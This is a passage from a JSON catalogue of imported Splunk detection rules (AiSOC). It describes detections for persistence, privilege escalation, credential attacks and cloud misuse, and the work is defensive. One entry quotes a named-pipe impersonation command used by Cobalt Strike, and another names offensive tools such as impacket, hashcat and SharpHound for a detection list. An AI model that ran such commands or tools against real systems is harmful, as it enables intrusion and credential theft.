If confirmed, this could allow an attacker to reboot the system or perform other critical actions, leading to system instability or further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-unix-shell-enable-all-sysrq-functions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e7a96937-3b58-4962-8dce-538e4763cf15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_unix_shell_enable_all_sysrq_functions.yml" } }, { "id": "splunk-security-content-e7ecc5e0-88df-48b9-91af-51104c68f02f", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen City", "description": "The following analytic detects cloud provisioning activities originating from previously unseen cities. It leverages cloud infrastructure logs and compares the geographic location of the source IP address against a baseline of known locations. This activity is significant as it may indicate unauthorized access or misuse of cloud resources from an unexpected location. 
If confirmed malicious, this could lead to unauthorized resource creation, potential data exfiltration, or further compromise of cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-city.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e7ecc5e0-88df-48b9-91af-51104c68f02f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_city.yml" } }, { "id": "splunk-security-content-e84b3c74-f742-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock High Number List Foundation Model Failures", "description": "The following analytic identifies a high number of AccessDenied attempts to list AWS Bedrock foundation models. It leverages AWS CloudTrail logs to detect when a user or service experiences multiple failures when calling the ListFoundationModels API. This activity is significant as it may indicate an adversary performing reconnaissance of available AI models after compromising credentials with limited permissions. Repeated failures could suggest brute force attempts to enumerate accessible resources or misconfigured access controls. 
If confirmed malicious, this could represent early-stage reconnaissance before attempting to access or manipulate Bedrock models or knowledge bases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-high-number-list-foundation-model-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e84b3c74-f742-11ee-9f6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_high_number_list_foundation_model_failures.yml" } }, { "id": "splunk-security-content-e8fc95bc-a107-11eb-a978-acde48001122", "type": "detection", "name": "Wermgr Process Spawned CMD Or Powershell Process", "description": "The following analytic detects the spawning of cmd or PowerShell processes by the wermgr.exe process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process telemetry, including parent-child process relationships and command-line executions. This behavior is significant as it is commonly associated with code injection techniques used by malware like TrickBot to execute shellcode or malicious DLL modules. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-spawned-cmd-or-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e8fc95bc-a107-11eb-a978-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml" } }, { "id": "splunk-security-content-e91bd102-d630-4e76-ab73-7e3ba22c5961", "type": "detection", "name": "First Time Seen Child Process of Zoom", "description": "The following analytic identifies the first-time execution of child processes spawned by Zoom (zoom.exe or zoom.us). It leverages Endpoint Detection and Response (EDR) data, specifically monitoring process creation events and comparing them against previously seen child processes. This activity is significant because the execution of unfamiliar child processes by Zoom could indicate malicious exploitation or misuse of the application. 
If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/first-time-seen-child-process-of-zoom.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e91bd102-d630-4e76-ab73-7e3ba22c5961", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/first_time_seen_child_process_of_zoom.yml" } }, { "id": "splunk-security-content-e97a5ffe-90bf-11eb-928a-acde48001122", "type": "detection", "name": "BITS Job Persistence", "description": "The following analytic detects the use of `bitsadmin.exe` to schedule a BITS job for persistence on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line parameters such as `create`, `addfile`, and `resume`. This activity is significant because BITS jobs can be used by attackers to maintain persistence, download malicious payloads, or exfiltrate data. 
If confirmed malicious, this could allow an attacker to persist in the environment, execute arbitrary code, or transfer sensitive information, necessitating further investigation and potential remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bits-job-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e97a5ffe-90bf-11eb-928a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bits_job_persistence.yml" } }, { "id": "splunk-security-content-e98944a9-92e4-443c-81b8-a322e33ce75a", "type": "detection", "name": "Azure Runbook Webhook Created", "description": "The following analytic detects the creation of a new Automation Runbook Webhook within an Azure tenant. It leverages Azure Audit events, specifically the \"Create or Update an Azure Automation webhook\" operation, to identify this activity. This behavior is significant because Webhooks can trigger Automation Runbooks via unauthenticated URLs exposed to the Internet, posing a security risk. 
If confirmed malicious, an attacker could use this to execute code, create users, or maintain persistence within the environment, potentially leading to unauthorized access and control over Azure resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-runbook-webhook-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e98944a9-92e4-443c-81b8-a322e33ce75a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_runbook_webhook_created.yml" } }, { "id": "splunk-security-content-e9926391-ec0c-4bad-8a95-e450dbf6aae4", "type": "detection", "name": "Windows Certutil Root Certificate Addition", "description": "The following analytic detects the use of certutil.exe to add a certificate to the Root certificate store using the \"-addstore\" flag.\nIn this case, the certificate is loaded from a temporary file path (e.g., %TEMP%) or other uncommon locations (e.g. 
C:\\\\Users\\\\Public\\\\), which is highly suspicious and uncommon in legitimate administrative activity.\nThis behavior may indicate an adversary is installing a malicious root certificate to intercept HTTPS traffic, impersonate trusted entities, or bypass security controls.\nThe use of flags such as -f (force) and -Enterprise, combined with loading .tmp files from user-writable locations, is consistent with post-exploitation activity seen in credential theft and adversary-in-the-middle (AiTM) attacks.\nThis should be investigated immediately, especially if correlated with unauthorized privilege use or prior certificate modifications.\nYou should monitor when new certificates are added to the root store because this store is what your system uses to decide which websites, apps, and software can be trusted.\nIf an attacker manages to add their own certificate there, they can silently intercept encrypted traffic, impersonate trusted websites, or make malicious programs look safe.\nThis means they could steal sensitive data, bypass security tools, and keep access to your system even after other malware is removed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-certutil-root-certificate-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9926391-ec0c-4bad-8a95-e450dbf6aae4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_certutil_root_certificate_addition.yml" } }, { 
"id": "splunk-security-content-e99fcc4f-c6b0-4443-aa2a-e3c85126ec9a", "type": "detection", "name": "Windows Common Abused Cmd Shell Risk Behavior", "description": "The following analytic identifies instances where four or more distinct detection analytics are associated with malicious command line behavior on a specific host. This detection leverages the Command Line Interface (CLI) data from various sources to identify suspicious activities. This behavior is significant as it often indicates attempts to execute malicious commands, access sensitive data, install backdoors, or perform other nefarious actions. If confirmed malicious, attackers could gain unauthorized control, exfiltrate information, escalate privileges, or launch further attacks within the network, leading to severe compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222", "T1049", "T1033", "T1529", "T1016", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-common-abused-cmd-shell-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e99fcc4f-c6b0-4443-aa2a-e3c85126ec9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_common_abused_cmd_shell_risk_behavior.yml" } }, { "id": "splunk-security-content-e9d05aa2-32f0-411b-930c-5b8ca5c4fcee", "type": "detection", "name": "Windows MSIExec Spawn Discovery Command", "description": "The following analytic detects MSIExec spawning multiple discovery commands.\nThis behavior is identified using data from 
Endpoint Detection and Response (EDR) agents, focusing on process creation events where MSIExec is the parent process.\nIf confirmed malicious, an attacker could use these discovery commands to gather system information, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-spawn-discovery-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9d05aa2-32f0-411b-930c-5b8ca5c4fcee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_spawn_discovery_command.yml" } }, { "id": "splunk-security-content-e9d0b9e6-2f3c-4a8a-9d61-2b6f4a9c1c2e", "type": "detection", "name": "Cisco Isovalent - Pods Running Offensive Tools", "description": "The following analytic detects execution of known offensive tooling from within Kubernetes pods, including network scanners and post-exploitation frameworks (e.g., nmap, masscan, zmap, impacket-*, hashcat, john, SharpHound, kube-hunter, peirates). We have created a macro named `linux_offsec_tool_processes` that contains the list of known offensive tooling found on linux systems. Adversaries commonly introduce these tools into compromised workloads to conduct discovery, lateral movement, credential access, or cluster reconnaissance. This behavior may indicate a compromised container or supply-chain abuse. 
Extra scrutiny is warranted for namespaces that do not typically run diagnostic scanners and for pods that suddenly begin invoking these binaries outside of normal maintenance activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-pods-running-offensive-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e9d0b9e6-2f3c-4a8a-9d61-2b6f4a9c1c2e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___pods_running_offensive_tools.yml" } }, { "id": "splunk-security-content-ea4e2c41-dbfb-4f5f-a7b6-9ac1b7f104aa", "type": "detection", "name": "O365 Multi-Source Failed Authentications Spike", "description": "The following analytic identifies a spike in failed authentication attempts within an Office 365 environment, indicative of a potential distributed password spraying attack. It leverages UserLoginFailed events from O365 Management Activity logs, focusing on ErrorNumber 50126. This detection is significant as it highlights attempts to bypass security controls using multiple IP addresses and user agents. If confirmed malicious, this activity could lead to unauthorized access, data breaches, privilege escalation, and lateral movement within the organization. 
Early detection is crucial to prevent account takeovers and mitigate subsequent threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multi-source-failed-authentications-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea4e2c41-dbfb-4f5f-a7b6-9ac1b7f104aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multi_source_failed_authentications_spike.yml" } }, { "id": "splunk-security-content-ea61e291-af05-4716-932a-67faddb6ae6f", "type": "detection", "name": "Powershell COM Hijacking InprocServer32 Modification", "description": "The following analytic detects attempts to modify or add a Component Object Model (COM) entry to the InProcServer32 path within the registry using PowerShell. It leverages PowerShell ScriptBlock Logging (EventCode 4104) to identify suspicious script blocks that target the InProcServer32 registry path. This activity is significant because modifying COM objects can be used for persistence or privilege escalation by attackers. 
If confirmed malicious, this could allow an attacker to execute arbitrary code or maintain persistent access to the compromised system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-com-hijacking-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea61e291-af05-4716-932a-67faddb6ae6f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_com_hijacking_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-ea688274-9c06-4473-b951-e4cb7a5d7a45", "type": "detection", "name": "TOR Traffic", "description": "The following analytic identifies allowed network traffic to The Onion Router (TOR), an anonymity network often exploited for malicious activities.\nIt leverages data from Next Generation Firewalls, using the Network_Traffic data model to detect traffic where the application is TOR and the action is allowed.\nThis activity is significant as TOR can be used to bypass conventional monitoring, facilitating hacking, data breaches, and illicit content dissemination.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, and severe compliance violations, compromising the integrity and security of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], 
"log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tor-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea688274-9c06-4473-b951-e4cb7a5d7a45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/tor_traffic.yml" } }, { "id": "splunk-security-content-ea73128a-43ab-11ec-9753-acde48001122", "type": "detection", "name": "CSC Net On The Fly Compilation", "description": "The following analytic detects the use of the .NET compiler csc.exe for on-the-fly compilation of potentially malicious .NET code. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with csc.exe. This activity is significant because adversaries and malware often use this technique to evade detection by compiling malicious code at runtime. 
If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/csc-net-on-the-fly-compilation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea73128a-43ab-11ec-9753-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/csc_net_on_the_fly_compilation.yml" } }, { "id": "splunk-security-content-ea91651a-772a-4b02-ac3d-985b364a5f07", "type": "detection", "name": "Windows Known Abused DLL Created", "description": "The following analytic identifies the creation of Dynamic Link Libraries (DLLs) with a known history of exploitation in atypical locations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and filesystem events. This activity is significant as it may indicate DLL search order hijacking or sideloading, techniques used by attackers to execute arbitrary code, maintain persistence, or escalate privileges. 
If confirmed malicious, this activity could allow attackers to blend in with legitimate operations, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-abused-dll-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ea91651a-772a-4b02-ac3d-985b364a5f07", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_abused_dll_created.yml" } }, { "id": "splunk-security-content-eabbac3a-45aa-4659-920f-6b8cff383fb8", "type": "detection", "name": "Windows Registry BootExecute Modification", "description": "The following analytic detects modifications to the BootExecute registry key, which manages applications and services executed during system boot. It leverages data from the Endpoint.Registry data model, focusing on changes to the registry path \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\BootExecute\". This activity is significant because unauthorized changes to this key can indicate attempts to achieve persistence, load malicious code, or tamper with the boot process. 
If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary code at boot, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-bootexecute-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eabbac3a-45aa-4659-920f-6b8cff383fb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_bootexecute_modification.yml" } }, { "id": "splunk-security-content-eac4de87-7a56-4538-a21b-277897af6d8d", "type": "detection", "name": "Azure AD Application Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. It leverages Azure Active Directory events, specifically monitoring the \"Add member to role\" operation. This activity is significant because users in this role can manage all aspects of enterprise applications, including credentials, which can be used to impersonate application identities. 
If confirmed malicious, an attacker could escalate privileges, manage application settings, and potentially access sensitive resources by impersonating application identities, posing a significant security risk to the Azure AD tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-application-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eac4de87-7a56-4538-a21b-277897af6d8d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_application_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-eac5e8ba-4857-11ec-9371-acde48001122", "type": "detection", "name": "Loading Of Dynwrapx Module", "description": "The following analytic detects the loading of the dynwrapx.dll module, which is associated with the DynamicWrapperX ActiveX component. This detection leverages Sysmon EventCode 7 to identify processes that load or register dynwrapx.dll. This activity is significant because DynamicWrapperX can be used to call Windows API functions in scripts, making it a potential tool for malicious actions. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the host. 
Immediate investigation of parallel processes and registry modifications is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/loading-of-dynwrapx-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eac5e8ba-4857-11ec-9371-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/loading_of_dynwrapx_module.yml" } }, { "id": "splunk-security-content-eaf688b3-bb8f-454d-b105-920a862cd8cb", "type": "detection", "name": "Windows Default Group Policy Object Modified with GPME", "description": "The following analytic detects modifications to default Group Policy Objects (GPOs) using the Group Policy Management Editor (GPME). It leverages the Endpoint data model to identify processes where `mmc.exe` executes `gpme.msc` with specific GUIDs related to default GPOs. This activity is significant because default GPOs, such as the `Default Domain Controllers Policy` and `Default Domain Policy`, are critical for enforcing security policies across the domain. 
If malicious, such modifications could allow an attacker to gain further access, establish persistence, or deploy malware across numerous hosts, severely compromising the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-group-policy-object-modified-with-gpme.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eaf688b3-bb8f-454d-b105-920a862cd8cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml" } }, { "id": "splunk-security-content-eb120f5f-b879-4a63-97c1-93352b5df844", "type": "detection", "name": "Creation of Shadow Copy", "description": "The following analytic detects the creation of shadow copies using Vssadmin or Wmic. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because creating shadow copies can be a precursor to ransomware attacks or data exfiltration, allowing attackers to bypass file locks and access sensitive data. 
If confirmed malicious, this behavior could enable attackers to maintain persistence, recover deleted files, or prepare for further malicious activities, posing a significant risk to the integrity and confidentiality of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb120f5f-b879-4a63-97c1-93352b5df844", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_shadow_copy.yml" } }, { "id": "splunk-security-content-eb277ba0-b96b-11eb-b00e-acde48001122", "type": "detection", "name": "CMD Echo Pipe - Escalation", "description": "The following analytic identifies the use of named-pipe impersonation for privilege escalation, commonly associated with Cobalt Strike and similar frameworks. It detects command-line executions where `cmd.exe` uses `echo` to write to a named pipe, such as `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant as it indicates potential privilege escalation attempts. 
If confirmed malicious, attackers could gain elevated privileges, enabling further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmd-echo-pipe-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb277ba0-b96b-11eb-b00e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmd_echo_pipe___escalation.yml" } }, { "id": "splunk-security-content-eb3e6702-8936-11ec-98fe-acde48001122", "type": "detection", "name": "Unusual Number of Kerberos Service Tickets Requested", "description": "The following analytic identifies an unusual number of Kerberos service ticket requests, potentially indicating a kerberoasting attack. It leverages Kerberos Event 4769 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This activity is significant as kerberoasting allows adversaries to request service tickets and crack them offline, potentially gaining privileged access to the domain. 
If confirmed malicious, this could lead to unauthorized access to sensitive accounts and escalation of privileges within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-kerberos-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb3e6702-8936-11ec-98fe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_kerberos_service_tickets_requested.yml" } }, { "id": "splunk-security-content-eb59cf01-1874-4d16-b7e4-54a6eb9b3118", "type": "detection", "name": "Windows Proxy Execution of .NET Utilities via Scripts", "description": "The following analytic detects the launch of common .NET-related utilities\u2014aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, or vbc.exe\u2014when the parent appears to be a script (batch, CMD, PowerShell, JScript, VBScript, or HTML) running from an unusual or user-writable Windows location (for example Public, Temp, Fonts, Debug, Recycle Bin, Prefetch, or similar paths), and the child process shows little or no command-line variation from the image path or name.\nThat pattern is consistent with adversaries using trusted .NET binaries as a proxy to run code while hiding execution behind script parents in low-trust folders, behavior associated with techniques such as signed binary proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
